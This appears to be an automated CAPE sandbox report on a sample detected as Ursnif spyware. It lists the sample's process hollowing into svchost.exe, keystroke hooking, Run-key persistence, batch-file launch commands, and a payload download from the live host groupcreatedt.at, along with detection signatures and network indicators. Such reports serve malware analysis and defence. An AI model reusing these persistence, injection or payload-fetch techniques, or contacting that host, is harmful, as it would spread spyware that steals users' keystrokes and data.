DynamicLoader: bcryptprimitives.dll/GetHashInterface
DynamicLoader: bcryptprimitives.dll/GetHashInterface
DynamicLoader: cryptnet.dll/I_CryptNetGetConnectivity
DynamicLoader: bcryptprimitives.dll/GetHashInterface
DynamicLoader: bcryptprimitives.dll/GetHashInterface
DynamicLoader: cryptnet.dll/CryptRetrieveObjectByUrlW
DynamicLoader: SETUPAPI.dll/SetupIterateCabinetW
DynamicLoader: bcryptprimitives.dll/GetHashInterface
DynamicLoader: cryptnet.dll/CryptGetObjectUrl
DynamicLoader: cryptnet.dll/CryptGetObjectUrl
DynamicLoader: cryptnet.dll/CryptRetrieveObjectByUrlW
DynamicLoader: bcryptprimitives.dll/GetHashInterface
DynamicLoader: bcryptprimitives.dll/GetHashInterface
DynamicLoader: bcryptprimitives.dll/GetHashInterface
DynamicLoader: cryptnet.dll/I_CryptNetGetConnectivity
DynamicLoader: cryptnet.dll/CryptRetrieveObjectByUrlW
DynamicLoader: ADVAPI32.dll/RegDeleteTreeA
DynamicLoader: ADVAPI32.dll/RegDeleteTreeW
DynamicLoader: ADVAPI32.dll/RegDeleteTreeA
DynamicLoader: ADVAPI32.dll/RegDeleteTreeW
DynamicLoader: SETUPAPI.dll/SetupIterateCabinetW
DynamicLoader: bcryptprimitives.dll/GetHashInterface
DynamicLoader: cryptnet.dll/CryptGetObjectUrl
DynamicLoader: cryptnet.dll/CryptGetObjectUrl
DynamicLoader: cryptnet.dll/CryptRetrieveObjectByUrlW
DynamicLoader: bcryptprimitives.dll/GetHashInterface
DynamicLoader: bcryptprimitives.dll/GetHashInterface
DynamicLoader: bcryptprimitives.dll/GetHashInterface
DynamicLoader: cryptnet.dll/I_CryptNetGetConnectivity
DynamicLoader: CRYPT32.dll/CertVerifyCertificateChainPolicy
DynamicLoader: CRYPT32.dll/CertFreeCertificateChain
DynamicLoader: CRYPT32.dll/CertDuplicateCertificateContext
DynamicLoader: ncrypt.dll/SslEncryptPacket
DynamicLoader: ncrypt.dll/SslDecryptPacket
DynamicLoader: ole32.dll/CreateStreamOnHGlobal
DynamicLoader: CRYPT32.dll/CertFreeCertificateContext
DynamicLoader: RPCRT4.dll/RpcBindingFree
DynamicLoader: CRYPT32.dll/CertFreeCertificateContext
DynamicLoader: ADVAPI32.dll/RegCreateKeyA
DynamicLoader: ADVAPI32.dll/RegSetValueExA
DynamicLoader: USER32.dll/SetWindowsHookExA
DynamicLoader: USER32.dll/RegisterClassA
DynamicLoader: USER32.dll/CreateWindowExA
DynamicLoader: USER32.dll/GetWindowLongPtrA
DynamicLoader: USER32.dll/DefWindowProcA
DynamicLoader: USER32.dll/SetWindowLongPtrA
DynamicLoader: USER32.dll/SetClipboardViewer
DynamicLoader: USER32.dll/IsClipboardFormatAvailable
DynamicLoader: USER32.dll/GetClipboardOwner
DynamicLoader: USER32.dll/RegisterDeviceNotificationA
DynamicLoader: USER32.dll/GetMessageA
DynamicLoader: ADVAPI32.dll/RegQueryValueExW
DynamicLoader: SHLWAPI.dll/StrChrW
DynamicLoader: SHLWAPI.dll/PathCombineW
DynamicLoader: WS2_32.dll/
DynamicLoader: ncrypt.dll/SslDecrementProviderReferenceCount
DynamicLoader: ncrypt.dll/SslFreeObject
DynamicLoader: WS2_32.dll/
DynamicLoader: WS2_32.dll/
Encrypts a single HTTP packet
http_request: GET /license/3_0.txt HTTP/1.1 Cache-Control: no-cache Connection: Keep-Alive Pragma: no-cache Host: www.php.net
http_request: GET /license/3_0.txt HTTP/1.1 Cache-Control: no-cache Connection: Keep-Alive Pragma: no-cache Host: www.php.net
Reads data out of its own binary image
self_read: process: KmHJvidHgRX.exe, pid: 3064, offset: 0x00000000, length: 0x0004ea00
A process created a hidden window
Process: KmHJvidHgRX.exe -> C:\Users\user\AppData\Local\Temp\F9FA\7CDD.bat
CAPE extracted potentially suspicious content
KmHJvidHgRX.exe: Injected PE Image: 32-bit executable
corrawex.exe: Injected PE Image: 64-bit executable
corrawex.exe: Injected Shellcode/Data
corrawex.exe: Ursnif Payload: 64-bit DLL
corrawex.exe: [{u'strings': [u'{ 41 8B 02 FF C1 41 33 C3 45 8B 1A 41 33 C0 D3 C8 41 89 02 49 83 C2 04 83 C2 FF 75 D9 }', u'{ 44 8B D9 33 C0 45 33 C9 44 33 1D 2D B9 01 00 4C 8B D2 48 85 D2 74 37 4C 8D 42 10 45 3B 0A 73 2E 45 39 58 F8 75 1C 41 F6 40 FC 01 74 12 }'], u'meta': {u'cape_type': u'Ursnif Payload', u'description': u'Ursnif Payload', u'author': u'kevoreilly & enzo'}, u'addresses': {u'decrypt_config64': 125588L, u'crypto64_1': 171678L}, u'name': u'Ursnif'}]
corrawex.exe: Injected PE Image
corrawex.exe: Ursnif Payload: 64-bit DLL
corrawex.exe: [{u'strings': [u'{ 41 8B 02 FF C1 41 33 C3 45 8B 1A 41 33 C0 D3 C8 41 89 02 49 83 C2 04 83 C2 FF 75 D9 }', u'{ 44 8B D9 33 C0 45 33 C9 44 33 1D 2D B9 01 00 4C 8B D2 48 85 D2 74 37 4C 8D 42 10 45 3B 0A 73 2E 45 39 58 F8 75 1C 41 F6 40 FC 01 74 12 }'], u'meta': {u'cape_type': u'Ursnif Payload', u'description': u'Ursnif Payload', u'author': u'kevoreilly & enzo'}, u'addresses': {u'decrypt_config64': 123224L, u'crypto64_1': 169314L}, u'name': u'Ursnif'}]
svchost.exe: Injected PE Image: 64-bit executable
svchost.exe: Injected Shellcode/Data
HTTP traffic contains suspicious features which may be indicative of malware related traffic
get_no_useragent: HTTP traffic contains a GET request with no user-agent header
suspicious_request: http://www.php.net/license/3_0.txt
suspicious_request: http://groupcreatedt.at/key/x64.bin
Performs some HTTP requests
url: http://www.php.net/license/3_0.txt
url: http://www.download.windowsupdate.com/msdownload/update/v3/static/trustedr/en/authrootstl.cab
url: http://www.microsoft.com/pki/certs/MicRooCerAut_2010-06-23.crt
url: http://groupcreatedt.at/key/x64.bin
The binary likely contains encrypted or compressed data.
section: name: .rsrc, entropy: 8.00, characteristics: IMAGE_SCN_CNT_INITIALIZED_DATA|IMAGE_SCN_MEM_READ, raw_size: 0x00045a00, virtual_size: 0x00045910
Uses Windows utilities for basic functionality
command: cmd /c ""C:\Users\user\AppData\Local\Temp\F9FA\7CDD.bat" "C:\Users\user\AppData\Roaming\MICROS~1\Bdeudlgs\corrawex.exe" "C:\Users\user\AppData\Local\Temp\KMHJVI~1.EXE""
command: cmd /C ""C:\Users\user\AppData\Roaming\MICROS~1\Bdeudlgs\corrawex.exe" "C:\Users\user\AppData\Local\Temp\KMHJVI~1.EXE""
Uses Windows utilities for basic functionality
command: C:\Users\user\AppData\Local\Temp\F9FA\7CDD.bat "C:\Users\user\AppData\Roaming\MICROS~1\Bdeudlgs\corrawex.exe" "C:\Users\user\AppData\Local\Temp\KMHJVI~1.EXE"
Queries information on disks for anti-virtualization via Device Information APIs
Behavioural detection: Injection (Process Hollowing)
Injection: corrawex.exe(2980) -> svchost.exe(1308)
Executed a process and injected code into it, probably while unpacking
Injection: corrawex.exe(2980) -> svchost.exe(1308)
Deletes its original binary from disk
Sniffs keystrokes
SetWindowsHookExA: Process: explorer.exe(1708)
Behavioural detection: Injection (inter-process)
Behavioural detection: Injection with CreateRemoteThread in a remote process
A system process is generating network traffic likely as a result of process injection
network_connection: explorer.exe_WSASend_get /license/3_0.txt http/1.1 cache-control: no-cache connection: keep-alive pragma: no-cache host: www.php.net
network_connection: explorer.exe_WSASend_get /key/x64.bin http/1.1 cache-control: no-cache connection: keep-alive pragma: no-cache host: groupcreatedt.at
network_connection: explorer.exe_WSASend_\x16\x03\x01\x00n\x01\x00\x00j\x03\x01^y\xd7rk\xe4yv\xb8{ke\xf1\x90\xb4b\x95.\xb6\xccz\xd1 \xc20\xcc \xfbkal\xda\x00\x00\x18\x00/\x005\x00\x05\x00 \xc0\x13\xc0\x14\xc0 \xc0 \x002\x008\x00\x13\x00\x04\x01\x00\x00)\xff\x01\x00\x01\x00\x00\x00\x00\x10\x00\x0e\x00\x00\x0bwww.php.net\x00 \x00\x06\x00\x04\x00\x17\x00\x18\x00\x0b\x00\x02\x01\x00
network_connection: explorer.exe_WSASend_\x16\x03\x01\x00f\x10\x00\x00ba\x04s\x06l\xf0\x10\x05\xe3\xc6#\xcf \x9eq"2\xea\x95 \xbe\x14)\x0c\x82\x12\xe0~2\x9e\xf63t\xb61y7\xa7 \x0cw\xe2\xf7\xb7t\xc5cba!\x00\xbd\xe0\x0f\x87\x9ah\x83\xf61\xac8\xee\xaf4\x06\x14\x03\x01\x00\x01\x01\x16\x03\x01\x000\xd0\~\xa9\x18l<\xa13^l\xbf\x96\x1f2 1\x837\xfa\xb7\x8e\xc7\x03\xe75\xd1\x181fv\x8ap4\xd9\xea\x1a\x93%8\xe4=\x7fs<\x1au\
network_connection: explorer.exe_WSASend_get /msdownload/update/v3/static/trustedr/en/authrootstl.cab http/1.1 cache-control: max-age = 3600 connection: keep-alive accept: */* if-modified-since: wed, 26 feb 2020 21:39:14 gmt if-none-match: "06d5b30edecd51:0" user-agent: microsoft-cryptoapi/
network_connection: explorer.exe_WSASend_\x17\x03\x01\x00\x90,\x1bl\x92\xf1\x82cjq\xfegj\x1b\xd7\x834\xfb\x11\xd2\xb4~c3e\xcej\x1b&\xc44j\x06@\x1da\x98\xd50\x02\x08\xcbd\x1c:g\x90\x9f1\x8fd\x98\xcd\x81\x03\xa7\x0f\x92\x10\x9e\xc5\x17i\xd5\xf0\xd4y\xec\xa8qp}2\xa8\xea\xcf\x1b\xdc\xb4\x14\xa6\xe2\x8c\xb0\xbal\x84\x9c\xd1\xfb \xe4\x19n\x1e \xfc\x05\xa4d\xbco\xf1en\xa7\xb7\xb3\x00\xb4\x00]\xb7\x101\x11\xce\xa3\xa6\x1d\xe5!\xc6\xe8\xd6\xa2<\xa4qooi0\xb2\x85\xeb \xad\xf1y\x16\x9a\xccq\xad
Installs itself for autorun at Windows startup
key: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run\dnshdrt
data: C:\Users\user\AppData\Roaming\Microsoft\Bdeudlgs\corrawex.exe
Exhibits behavior characteristics of Ursnif spyware
CAPE detected the Ursnif malware family
Creates a copy of itself
copy: C:\Users\user\AppData\Roaming\Microsoft\Bdeudlgs\corrawex.exe
Drops a binary and executes it
binary: C:\Users\user\AppData\Roaming\Microsoft\Bdeudlgs\corrawex.exe
binary: C:\Users\user\AppData\Roaming\Microsoft\Bdeudlgs\corrawex.exe
Creates a slightly modified copy of itself
file: C:\Users\user\AppData\Roaming\Microsoft\Bdeudlgs\corrawex.exe
percent_match: 99

Screenshots


Hosts

Direct IP Country Name
Y 8.8.8.8 [VT] United States
N 23.202.161.73 [VT] United States
N 192.42.116.41 [VT] Netherlands
N 192.229.232.240 [VT] United States
N 185.85.0.29 [VT] Germany

DNS

Name Response Post-Analysis Lookup
www.php.net [VT] A 185.85.0.29 [VT]
CNAME www-php-net.ax4z.com [VT]
www.download.windowsupdate.com [VT] CNAME cs12.wpc.v0cdn.net [VT]
A 192.229.232.240 [VT]
CNAME 2-01-3cf7-0009.cdx.cedexis.net [VT]
CNAME wu.ec.azureedge.net [VT]
CNAME wu.wpc.apr-52dd2.edgecastdns.net [VT]
CNAME wu.azureedge.net [VT]
www.microsoft.com [VT] CNAME www.microsoft.com-c-3.edgekey.net.globalredir.akadns.net [VT]
CNAME e13678.dspb.akamaiedge.net [VT]
CNAME www.microsoft.com-c-3.edgekey.net [VT]
A 23.202.161.73 [VT]
groupcreatedt.at [VT] A 192.42.116.41 [VT]

Summary

C:\Windows\Globalization\Sorting\sortdefault.nls
C:\Users\user\AppData\Local\Temp\gfycfilt.dll
C:\Windows\System32\gfycfilt.dll
C:\Windows\system\gfycfilt.dll
C:\Windows\gfycfilt.dll
C:\Windows\System32\wbem\gfycfilt.dll
C:\Windows\System32\WindowsPowerShell\v1.0\gfycfilt.dll
C:\Users\user\AppData\Local\Temp\KmHJvidHgRX.exe
C:\Users
C:\Users\user
C:\Users\user\AppData
C:\Users\user\AppData\Local
C:\Users\user\AppData\Local\Temp
C:\321.txt
C:\Windows\sysnative\C_1252.NLS
C:\Windows\sysnative\*.dll
C:\Users\user\AppData\Roaming\Microsoft
C:\Users\user\AppData\Roaming\Microsoft\Bdeudlgs
C:\Users\user\AppData\Roaming\Microsoft\Bdeudlgs\corrawex.exe
C:\Users\user\AppData\Local\Temp\F9FA
C:\Users\user\AppData\Local\Temp\F9FA\7CDD.tmp
C:\Users\user\AppData\Local\Temp\F9FA\7CDD.bat
\??\MountPointManager
C:\Users\user\AppData\Local\Temp\"C:\Users\user\AppData\Local\Temp\F9FA\7CDD.bat"
C:\Users\user\AppData\Local\Temp\cmd.*
C:\Users\user\AppData\Local\Temp\cmd
C:\Windows\System32\cmd.*
C:\Windows\System32\cmd.COM
C:\Windows\System32\cmd.exe
C:\
C:\Users\user\AppData\Local\Temp\"C:\Users\user\AppData\Roaming\MICROS~1\Bdeudlgs\corrawex.exe"
C:\Users\user\AppData\Roaming\Microsoft\Bdeudlgs\gfycfilt.dll
C:\Users\user\AppData\Roaming
C:\Windows\sysnative\p2pcollab.dll
C:\Windows\sysnative\QAGENTRT.DLL
C:\Windows\sysnative\dnsapi.dll
C:\Windows\sysnative\fveui.dll
C:\Users\user\AppData\Roaming\Microsoft\SystemCertificates\My\Certificates\*
C:\Users\user\AppData\Roaming\Microsoft\SystemCertificates\My\CRLs\*
C:\Users\user\AppData\Roaming\Microsoft\SystemCertificates\My\CTLs\*
C:\Users\user\AppData\Local\Temp\Cab6E6C.tmp
C:\Users\user\AppData\Local\Temp\Tar6E6D.tmp
C:\Users\user\AppData\Local\Temp\
C:\Windows\inf\
C:\Users\user\AppData\Local\Temp\Cab6F0A.tmp
C:\Users\user\AppData\Local\Temp\Tar6F0B.tmp
C:\Windows\sysnative\en-US\WINHTTP.dll.mui
C:\Users\user\AppData\LocalLow
C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData
C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content
C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\94308059B57B3142E455B38A6EB92015
C:\Users\user\AppData\Local\Temp\Cab78DB.tmp
C:\Users\user\AppData\Local\Temp\Tar78DC.tmp
C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\F0ACCF77CDCBFF39F6191887F6D2D357
C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\F0ACCF77CDCBFF39F6191887F6D2D357
C:\Users\user\AppData\Local\Temp\Cab859A.tmp
C:\Users\user\AppData\Local\Temp\Tar859B.tmp
C:\Users\user\AppData\Local\Temp\Cab87BE.tmp
C:\Users\user\AppData\Local\Temp\Tar87BF.tmp
C:\Windows\sysnative\ntdll.dll
C:\Users\user\AppData\Roaming\system64.dll
C:\Users\user\AppData\Local\Temp\Cab9E9F.tmp
C:\Users\user\AppData\Local\Temp\Tar9EA0.tmp
C:\Windows\sysnative\Cab9E9F.tmp
C:\Users\user\AppData\Local\Temp\CabA4B9.tmp
C:\Users\user\AppData\Local\Temp\TarA4BA.tmp
C:\Windows\sysnative\CabA4B9.tmp
C:\Users\user\AppData\Local\Temp\CabA509.tmp
C:\Users\user\AppData\Local\Temp\TarA50A.tmp
C:\Windows\sysnative\CabA509.tmp
C:\Users\user\AppData\Local\Temp\CabA77B.tmp
C:\Users\user\AppData\Local\Temp\TarA77C.tmp
C:\Windows\sysnative\CabA77B.tmp
C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\prefs.js
C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\*
C:\Windows\Globalization\Sorting\sortdefault.nls
C:\321.txt
C:\Windows\sysnative\C_1252.NLS
C:\Users\user\AppData\Local\Temp\KmHJvidHgRX.exe
C:\Users\user\AppData\Roaming\Microsoft\Bdeudlgs\corrawex.exe
C:\Users\user\AppData\Local\Temp\F9FA\7CDD.tmp
C:\Users\user\AppData\Local\Temp\F9FA\7CDD.bat
C:\Users\user\AppData\Local\Temp\Cab6E6C.tmp
C:\Users\user\AppData\Local\Temp\Tar6E6D.tmp
C:\Users\user\AppData\Local\Temp\Cab6F0A.tmp
C:\Users\user\AppData\Local\Temp\Tar6F0B.tmp
C:\Windows\sysnative\en-US\WINHTTP.dll.mui
C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\94308059B57B3142E455B38A6EB92015
C:\Users\user\AppData\Local\Temp\Cab78DB.tmp
C:\Users\user\AppData\Local\Temp\Tar78DC.tmp
C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\F0ACCF77CDCBFF39F6191887F6D2D357
C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\F0ACCF77CDCBFF39F6191887F6D2D357
C:\Users\user\AppData\Local\Temp\Cab859A.tmp
C:\Users\user\AppData\Local\Temp\Tar859B.tmp
C:\Users\user\AppData\Local\Temp\Cab87BE.tmp
C:\Users\user\AppData\Local\Temp\Tar87BF.tmp
C:\Windows\sysnative\ntdll.dll
C:\Users\user\AppData\Roaming\system64.dll
C:\Users\user\AppData\Local\Temp\Cab9E9F.tmp
C:\Users\user\AppData\Local\Temp\Tar9EA0.tmp
C:\Users\user\AppData\Local\Temp\CabA4B9.tmp
C:\Users\user\AppData\Local\Temp\TarA4BA.tmp
C:\Users\user\AppData\Local\Temp\CabA509.tmp
C:\Users\user\AppData\Local\Temp\TarA50A.tmp
C:\Users\user\AppData\Local\Temp\CabA77B.tmp
C:\Users\user\AppData\Local\Temp\TarA77C.tmp
C:\Users\user\AppData\Roaming\Microsoft\Bdeudlgs\corrawex.exe
C:\Users\user\AppData\Local\Temp\F9FA\7CDD.bat
C:\Users\user\AppData\Local\Temp\Cab6E6C.tmp
C:\Users\user\AppData\Local\Temp\Tar6E6D.tmp
C:\Users\user\AppData\Local\Temp\Cab6F0A.tmp
C:\Users\user\AppData\Local\Temp\Tar6F0B.tmp
C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\94308059B57B3142E455B38A6EB92015
C:\Users\user\AppData\Local\Temp\Cab78DB.tmp
C:\Users\user\AppData\Local\Temp\Tar78DC.tmp
C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\F0ACCF77CDCBFF39F6191887F6D2D357
C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\F0ACCF77CDCBFF39F6191887F6D2D357
C:\Users\user\AppData\Local\Temp\Cab859A.tmp
C:\Users\user\AppData\Local\Temp\Tar859B.tmp
C:\Users\user\AppData\Local\Temp\Cab87BE.tmp
C:\Users\user\AppData\Local\Temp\Tar87BF.tmp
C:\Users\user\AppData\Local\Temp\Cab9E9F.tmp
C:\Users\user\AppData\Local\Temp\Tar9EA0.tmp
C:\Users\user\AppData\Local\Temp\CabA4B9.tmp
C:\Users\user\AppData\Local\Temp\TarA4BA.tmp
C:\Users\user\AppData\Local\Temp\CabA509.tmp
C:\Users\user\AppData\Local\Temp\TarA50A.tmp
C:\Users\user\AppData\Local\Temp\CabA77B.tmp
C:\Users\user\AppData\Local\Temp\TarA77C.tmp
C:\Users\user\AppData\Local\Temp\F9FA\7CDD.bat
C:\Users\user\AppData\Local\Temp\KmHJvidHgRX.exe
C:\Users\user\AppData\Local\Temp\Cab6E6C.tmp
C:\Users\user\AppData\Local\Temp\Tar6E6D.tmp
C:\Users\user\AppData\Local\Temp\Cab6F0A.tmp
C:\Users\user\AppData\Local\Temp\Tar6F0B.tmp
C:\Users\user\AppData\Local\Temp\Cab78DB.tmp
C:\Users\user\AppData\Local\Temp\Tar78DC.tmp
C:\Users\user\AppData\Local\Temp\Cab859A.tmp
C:\Users\user\AppData\Local\Temp\Tar859B.tmp
C:\Users\user\AppData\Local\Temp\Cab87BE.tmp
C:\Users\user\AppData\Local\Temp\Tar87BF.tmp
C:\Users\user\AppData\Local\Temp\Cab9E9F.tmp
C:\Users\user\AppData\Local\Temp\Tar9EA0.tmp
C:\Users\user\AppData\Local\Temp\CabA4B9.tmp
C:\Users\user\AppData\Local\Temp\TarA4BA.tmp
C:\Users\user\AppData\Local\Temp\CabA509.tmp
C:\Users\user\AppData\Local\Temp\TarA50A.tmp
C:\Users\user\AppData\Local\Temp\CabA77B.tmp
C:\Users\user\AppData\Local\Temp\TarA77C.tmp
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\crypt32
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\crypt32\DebugHeapFlags
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\LDAP
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\LDAP\LdapClientIntegrity
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\LDAP\UseOldHostResolutionOrder
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\LDAP\UseHostnameAsAlias
DisableUserModeCallbackFilter
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run\dnshdrt
HKEY_USERS\
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders\AppData
HKEY_CURRENT_USER\Software\AppDataLow\Software\Microsoft\E437B5C6-F3A1-B6FE-9D58-D74A210CFB1E
HKEY_CURRENT_USER\Software\AppDataLow\Software\Microsoft\E437B5C6-F3A1-B6FE-9D58-D74A210CFB1E\Client
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\ShellCompatibility\Applications\KmHJvidHgRX.exe
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\CPC\Volume
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\CPC\Volume\{3abfb8f2-2ffd-11e7-a4cf-806e6f6e6963}\
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\CPC\Volume\{3abfb8f2-2ffd-11e7-a4cf-806e6f6e6963}\Data
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\CPC\Volume\{3abfb8f2-2ffd-11e7-a4cf-806e6f6e6963}\Generation
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\CPC\Volume\{5e1375cc-b5ba-11e3-a2f5-806e6f6e6963}\
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\CPC\Volume\{5e1375cc-b5ba-11e3-a2f5-806e6f6e6963}\Data
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\CPC\Volume\{5e1375cc-b5ba-11e3-a2f5-806e6f6e6963}\Generation
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\CPC\Volume\{5e1375cd-b5ba-11e3-a2f5-806e6f6e6963}\
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\CPC\Volume\{5e1375cd-b5ba-11e3-a2f5-806e6f6e6963}\Data
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\CPC\Volume\{5e1375cd-b5ba-11e3-a2f5-806e6f6e6963}\Generation
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows NT\CurrentVersion\GRE_Initialize
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\GRE_Initialize\DisableMetaFiles
HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\System
HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Command Processor\DisableUNCCheck
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Command Processor\EnableExtensions
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Command Processor\DelayedExpansion
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Command Processor\DefaultColor
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Command Processor\CompletionChar
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Command Processor\PathCompletionChar
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Command Processor\AutoRun
HKEY_CURRENT_USER\Software\Microsoft\Command Processor
HKEY_CURRENT_USER\Software\Microsoft\Command Processor\DisableUNCCheck
HKEY_CURRENT_USER\Software\Microsoft\Command Processor\EnableExtensions
HKEY_CURRENT_USER\Software\Microsoft\Command Processor\DelayedExpansion
HKEY_CURRENT_USER\Software\Microsoft\Command Processor\DefaultColor
HKEY_CURRENT_USER\Software\Microsoft\Command Processor\CompletionChar
HKEY_CURRENT_USER\Software\Microsoft\Command Processor\PathCompletionChar
HKEY_CURRENT_USER\Software\Microsoft\Command Processor\AutoRun
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\CustomLocale
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Nls\CustomLocale\en-GB
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\ExtendedLocale
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Nls\ExtendedLocale\en-GB
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\Locale
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\Locale\Alternate Sorts
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\Language Groups
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Nls\Locale\00000809
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Nls\Language Groups\1
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\SafeBoot\Option
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\Windows Error Reporting\WMR
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\Windows Error Reporting\WMR\Disable
HKEY_CURRENT_USER\Software\AppDataLow\Software\Microsoft\E437B5C6-F3A1-B6FE-9D58-D74A210CFB1E\Ini
HKEY_CURRENT_USER\Software\AppDataLow\Software\Microsoft\E437B5C6-F3A1-B6FE-9D58-D74A210CFB1E\Temp
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\SecurityProviders\Schannel
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\SecurityProviders\SCHANNEL\UserContextLockCount
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\SecurityProviders\SCHANNEL\UserContextListCount
HKEY_LOCAL_MACHINE\Software\Microsoft\Cryptography\OID
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography\OID\EncodingType 0
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography\OID\EncodingType 0\CryptDllFindOIDInfo
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography\OID\EncodingType 0\CryptDllFindOIDInfo\1.3.6.1.4.1.311.44.3.4!7
HKEY_LOCAL_MACHINE\Software\Microsoft\Cryptography\OID\EncodingType 0\CryptDllFindOIDInfo\1.3.6.1.4.1.311.44.3.4!7
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography\OID\EncodingType 0\CryptDllFindOIDInfo\1.3.6.1.4.1.311.44.3.4!7\Name
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\MUI\StringCacheSettings
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\MUI\StringCacheSettings\StringCacheGeneration
HKEY_CURRENT_USER
HKEY_CURRENT_USER\Software\Classes\Local Settings\MuiCache\37\52C64B7E
HKEY_CURRENT_USER\Software\Classes\Local Settings\MuiCache\37\52C64B7E\LanguageList
HKEY_CURRENT_USER\Software\Classes\Local Settings\MuiCache\37\52C64B7E\@%SystemRoot%\system32\p2pcollab.dll,-8042
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography\OID\EncodingType 0\CryptDllFindOIDInfo\1.3.6.1.4.1.311.47.1.1!7
HKEY_LOCAL_MACHINE\Software\Microsoft\Cryptography\OID\EncodingType 0\CryptDllFindOIDInfo\1.3.6.1.4.1.311.47.1.1!7
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography\OID\EncodingType 0\CryptDllFindOIDInfo\1.3.6.1.4.1.311.47.1.1!7\Name
HKEY_CURRENT_USER\Software\Classes\Local Settings\MuiCache\37\52C64B7E\@%SystemRoot%\system32\qagentrt.dll,-10
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography\OID\EncodingType 0\CryptDllFindOIDInfo\1.3.6.1.4.1.311.64.1.1!7
HKEY_LOCAL_MACHINE\Software\Microsoft\Cryptography\OID\EncodingType 0\CryptDllFindOIDInfo\1.3.6.1.4.1.311.64.1.1!7
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography\OID\EncodingType 0\CryptDllFindOIDInfo\1.3.6.1.4.1.311.64.1.1!7\Name
